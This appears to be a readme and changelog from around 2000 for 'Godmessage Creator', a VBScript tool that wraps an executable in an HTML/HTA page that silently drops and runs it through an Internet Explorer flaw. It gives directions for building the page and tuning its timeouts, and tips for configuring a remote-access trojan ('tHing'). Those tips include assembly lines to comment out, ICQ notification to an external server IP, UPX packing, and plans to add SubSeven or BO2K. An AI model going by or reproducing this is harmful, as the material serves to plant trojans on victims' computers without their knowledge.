Godmessage Creator 0.2

by The Pull 


*******************************************************************************************************
 Godmessage IV Creator v0.2
 Author: 6IT
 Thanks: The Pull - Creator of the original Godmessage - this is his brain child.
 Thanks: StoneFisk - Coauthor of Godmessage IV. his hex2script VB code helped
  with writing this
 Thanks: Al McLennan - For his LCODER program, without it this wouldn't be possible
 Thanks: To all the people who helped make godmessage what it is today

CHANGE lOG 10-12-00
GODMESSAGE IV
 - Deleted the setTimeout call of f() and replaced it with a call from the onload property
   of the BODY element. 
 - Set the remaining setTimeouts to 15, 3000, and 4500 respectively. 
 - Cleaned up the VBScript code a bit, used fso.DeleteFile to clean up files
 - A few other tweaks here and there

GMCreator 
 - encode onz.exe using XXE (onz.xfr)
 - increased file size limit to 26000 bytes (thanks to XXEncoding)
TODO
 - Optimize Godmessage code, remove unnessisary chars to make file smaller and raise
   onz.exe size limit
 - Possibly dynamically create godmessage from user supplied html file

*******************************************************************************************************

*******************************************************************************************************
Disclaimer: I take no responsibility for the use of this code.
I do not guarantee that my code is free from defects. My software is provided �as is,"
and you use the software at your own risk.

I make no warranties as to performance, merchantability, fitness for a particular purpose,
or any other warranties whether expressed or implied.

Under no circumstances shall I be liable for direct, indirect, special, incidental,
or consequential damages resulting from the use, misuse, or inability to use this software.
*******************************************************************************************************

*******************************************************************************************************
Directions:
 Unzip the the package into it's own directory 
 copy your "executable" over to the same directory as GMCreator.vbs
 Run GMCreator.vbs and enter in the filename of your executable
   - Program will rename the file onz.exe (deleteing original file)
   - File can't be larger than 17500 bytes.
 Program will then create a fully functional godmessage.html
   - Timeouts set to 3500 and 4000 
   - move and run commands enabled
   - Added content to the html page

******************************************************************************************************* 
"There he goes one of god's own prototypes. 
A high powered mutant of some kind never even considered for mass production.
Too weird to live and too rare to die." -Hunter S. Thompson 


*******************************************************************************************************
*******************************************************************************************************



CHANGES:

6IT and Stonefisk have been pretty busy at this, this week, as you can see.
Basically, put your onz.exe in the same directory, and double click on
the GMcreator file to make it create the HTML (thanks to 6IT, see his readme).

From now on, we will probably be working from those two dat files you see there,
so put any of your changes there.

What you might want to mess with... timeout values.
You want to test on the web various timeout values.
That, basically, is because slower connections may get an error with these
timeout values (or less). 

A few changes have been made which will allow it to work where in some instances
that it wouldn't work before. See below notes.
Another change has been made which will get rid of a bug where the HTA hangs open
for sometime... in some instances.

I will put misc notes below the rather basic changelog below.
These notes might be helpful later on. As of this date, Oct 13, 2000... M$ plans to
have a fix for this bug out in a few days.
They seem to be pondering rather to bother or not at all.
(According to a recent article in the Registry).

I can not stress the danger this is enough.
We saw how their fix was poorly implemented last year.
This is where I find fault with them.
They do not advertise the seriousness of this sort of bug and they do not require
downloads from all users.

KAK virus, not released until well after I considered the godmessage
useless because of the number of people upgraded became the most
widespread virus of the year. This situation will be worse.
This took M$ about six months last year.

OTHER CHANGES STILL NEEDED TO BE MADE: A self delete for the trojan HTA.
I know writing a bat file with a healthy pause, then deleting the HTA,
then deleting itself will work... but I am concerned about that working in all instances.

CHANGE lOG 10-12-00
GODMESSAGE IV
 - Deleted the setTimeout call of f() and replaced it with a call from the onload
   property of the BODY element. 
 - Set the remaining setTimeouts to 15, 3000, and 4500 respectively. 
 - Cleaned up the VBScript code a bit, used fso.DeleteFile to clean up files
 - A few other tweaks here and there
 - %comspec% was added to the debug line, which made it work on some systems it wasn't
   working on, thanks to [email protected] 
  - cleaned up bug that had the HTA hanging around sometime (SF did)

MISC NOTES, YOU MAY FIND HELPFUL.

In order to make the tHing 1.6 compatible with NT and w2k - and possibly Windows ME - you
need to comment out these lines and recompile:

;push offset Kernel32
;call GetModuleHandleA ; get the handle of kernel32.dll
;push offset RSP
;push eax
;call GetProcAddress ; get the address of the function
;mov ebx, eax ; save the pointer into ebx
;call GetCurrentProcessId ; get the current process's id
;push 1 ; 1 = Register as Service
;push eax ; process id
;call ebx ; call RegisterServiceProcess

That's it.

IF YOU DO THIS, you can not use "edit server" to edit your server.
You must put your ICQ number in the code as the default ICQ number.

In order to use ICQ notification on the tHing, for one thing you need to try the new address...

205.188.252.120

You will need to test that, and realize that the URL sent to send the page
 - YES a URL is sent - you may need to change that URL a bit.

USE UPX to pack the tHing.

You want to change the string sent to the server. ALL of this stuff is intuitive,
if you just look at the code. THERE ARE TWO PLACES where the server IP of ICQ is,
you need to change BOTH. Likewise, with port.

Don't look at the code and cough you heart up cause it is assembly. It is very simple.
This doesn't mean everything will work if you go beyond this and put a bunch of stuff in there.
Change the string, but try to not lessen nor increase it.

No support on that. We are working towards getting subseven or bo2k in there.
Until then there are a few 24k trojans or less. Kuang comes to mind.
--------------------------------------------------------------------------------------------------------------------------

PROPAGANDIST SOAPBOX ->

The Wilderness of Walls is this world. Beyond it is something else entirely.
Many claim to have been there,
but so cleverly is it designed against the impure of heart... that their paths
lead every which way... but where you are.

Confronting the silence in the heart.

FAQ

MegaSecurity